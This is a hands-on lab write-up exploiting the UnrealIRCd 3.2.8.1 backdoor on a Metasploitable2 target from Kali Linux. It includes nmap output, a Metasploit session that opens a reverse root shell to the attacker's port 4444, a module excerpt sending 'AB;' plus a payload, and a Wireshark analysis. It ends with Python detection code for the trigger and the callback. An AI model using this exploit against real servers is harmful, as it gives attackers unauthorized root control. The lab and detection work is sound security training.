- Systems used
KaliLinux
Metasploitable V2 Linux
- UnrealIRCd
UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new features have been added and modified, including advanced security features and bug fixes, and it has become a popular server.
> IRC is a chat server. (Many hacker groups use it to exchange information.)
- The bug
On port 6667, Metasploitable2 runs the UnrealIRCd IRC daemon. This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" followed by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell.
This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
exploit/unix/irc/unreal_ircd_3281_backdoor
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
> This is the bug present in the Unreal3.2.8.1.tar.gz distributed between November 2009 and June 12th, 2010.
> It seems to execute when you send the characters AB.
- Hands-on lab
(kali)
1. Check the daemon
# nmap -sV 192.168.17.134
Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-15 17:45 KST
Nmap scan report for 192.168.17.134
Host is up (0.000083s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.91 seconds
2. Check the packets with Wireshark
# wireshark &
3. Attack with msfconsole
# msfconsole
msf > search unreal_ircd

Matching Modules
================

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.17.134
RHOST => 192.168.17.134
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.17.50:4444
[*] 192.168.17.134:6667 - Connected to 192.168.17.134:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.17.134:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo XkAcueQy9P2Z8MTs;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "XkAcueQy9P2Z8MTs\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.17.50:4444 -> 192.168.17.134:59676) at 2017-11-15 17:53:43 +0900

id
uid=0(root) gid=0(root)
hostname
metasploitable
^C
Abort session 1? [y/N]  y

[*] 192.168.17.134 - Command shell session 1 closed.  Reason: User exit
msf exploit(unreal_ircd_3281_backdoor) > edit

      print_line("    #{line}")
    end

    print_status("Sending backdoor command...")
    sock.put("AB;" + payload.encoded + "\n")

    # Wait for the request to be handled
    1.upto(120) do
      break if session_created?
      select(nil, nil, nil, 0.25)
      handler()
    end

    disconnect
> We obtained root privileges.
> Checking with edit, I confirmed that the module sends AB followed by the payload code.
4. Check in Wireshark
> Filtering on IRC packets only, you can see that Kali sent a request of "AB; sh" to the 134 server.
> Looking at the exchanged content via Follow > TCP Stream,
> AB; sh -c '( .... )' was delivered.
sh -c means "run the following in a shell". Inside the parentheses you can see an infinite loop that keeps reconnecting to port 4444 on the Kali server.
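The two observations above (the trigger is the letters "AB" at the very start of a client line followed by a command, and the payload then makes the IRC host connect back out to the attacker's port 4444) are enough to write a detection. The following Python is an added example, not code from the original post, from Metasploit or from UnrealIRCd; the IRC lines and connection records it runs over are constructed to mirror the lab, and the names `detect_trigger` and `correlate_callback` are my own.

```python
"""Detection for the UnrealIRCd 3.2.8.1 backdoor trigger in captured IRC traffic.

Added example (not from the original post, Metasploit or UnrealIRCd). It turns
the write-up's two observations into checks a defender can run over a packet
export: (1) the trigger is "AB" at the start of a client->server line followed
by a system command ("AB; sh -c ..." in the capture), and (2) the payload makes
the IRC host open a connection back to the attacker (port 4444 in the lab).
All sample data below is constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Legitimate IRC client commands are alphabetic words (NICK, USER, PRIVMSG, ...)
# or three-digit numerics, so "AB" immediately followed by a non-letter is never
# a valid command word; that is exactly the shape the capture shows ("AB; sh").
TRIGGER = re.compile(r"^AB(?![A-Za-z])(?P<cmd>.*)$")

# (timestamp_seconds, direction "C>S" or "S>C", client_ip, payload)
IrcLine = Tuple[float, str, str, str]
# (timestamp_seconds, src_ip, dst_ip, dst_port) for each new TCP connection
Flow = Tuple[float, str, str, int]


@dataclass
class Alert:
    ts: float
    client_ip: str
    command: str  # text that would be handed to the backdoor after the "AB" marker


def detect_trigger(lines: Iterable[IrcLine]) -> List[Alert]:
    """Flag client->server lines that match the backdoor trigger shape."""
    alerts: List[Alert] = []
    for ts, direction, client_ip, payload in lines:
        if direction != "C>S":
            continue  # the trigger only ever comes from the client side
        m = TRIGGER.match(payload.rstrip("\r\n"))
        if m:
            alerts.append(Alert(ts, client_ip, m.group("cmd").lstrip("; ").strip()))
    return alerts


def correlate_callback(alerts: List[Alert], flows: Iterable[Flow],
                       irc_host: str, window: float = 60.0) -> List[Flow]:
    """Return outbound connections from the IRC host to a client that sent a
    trigger, opened within `window` seconds after that trigger (the reverse
    connection to port 4444 seen in the Wireshark stream)."""
    hits: List[Flow] = []
    for flow in flows:
        ts, src, dst, _ = flow
        if src != irc_host:
            continue
        if any(a.client_ip == dst and 0 <= ts - a.ts <= window for a in alerts):
            hits.append(flow)
    return hits


# Constructed sample modelled on the lab (Kali .50 talking to Metasploitable .134)
SAMPLE_LINES: List[IrcLine] = [
    (0.0, "C>S", "192.168.17.50", "NICK alice\r\n"),
    (0.1, "S>C", "192.168.17.50", ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n"),
    (0.5, "C>S", "192.168.17.50", "PRIVMSG #ops :AB; inside a message is not a trigger\r\n"),
    (0.6, "C>S", "192.168.17.50", "ABOUT is a well-formed (if unknown) command word\r\n"),
    (1.2, "C>S", "192.168.17.50", "AB; sh -c '(echo placeholder-command)'\r\n"),
]
SAMPLE_FLOWS: List[Flow] = [
    (0.0, "192.168.17.50", "192.168.17.134", 6667),   # the IRC session itself
    (1.4, "192.168.17.134", "192.168.17.50", 4444),   # IRC host calling back out
    (30.0, "192.168.17.134", "192.168.17.1", 53),     # unrelated DNS lookup
]

if __name__ == "__main__":
    found = detect_trigger(SAMPLE_LINES)
    for a in found:
        print(f"[ALERT] t={a.ts}s client={a.client_ip} backdoor command: {a.command!r}")
    for f in correlate_callback(found, SAMPLE_FLOWS, irc_host="192.168.17.134"):
        print(f"[ALERT] t={f[0]}s IRC host {f[1]} opened {f[2]}:{f[3]} shortly after the trigger")
```

The first check is what an IDS content rule on port 6667 would do; the second is the correlation a SOC would run on flow logs, because a server that starts originating connections to one of its own clients right after such a line is the clearest sign the command actually ran.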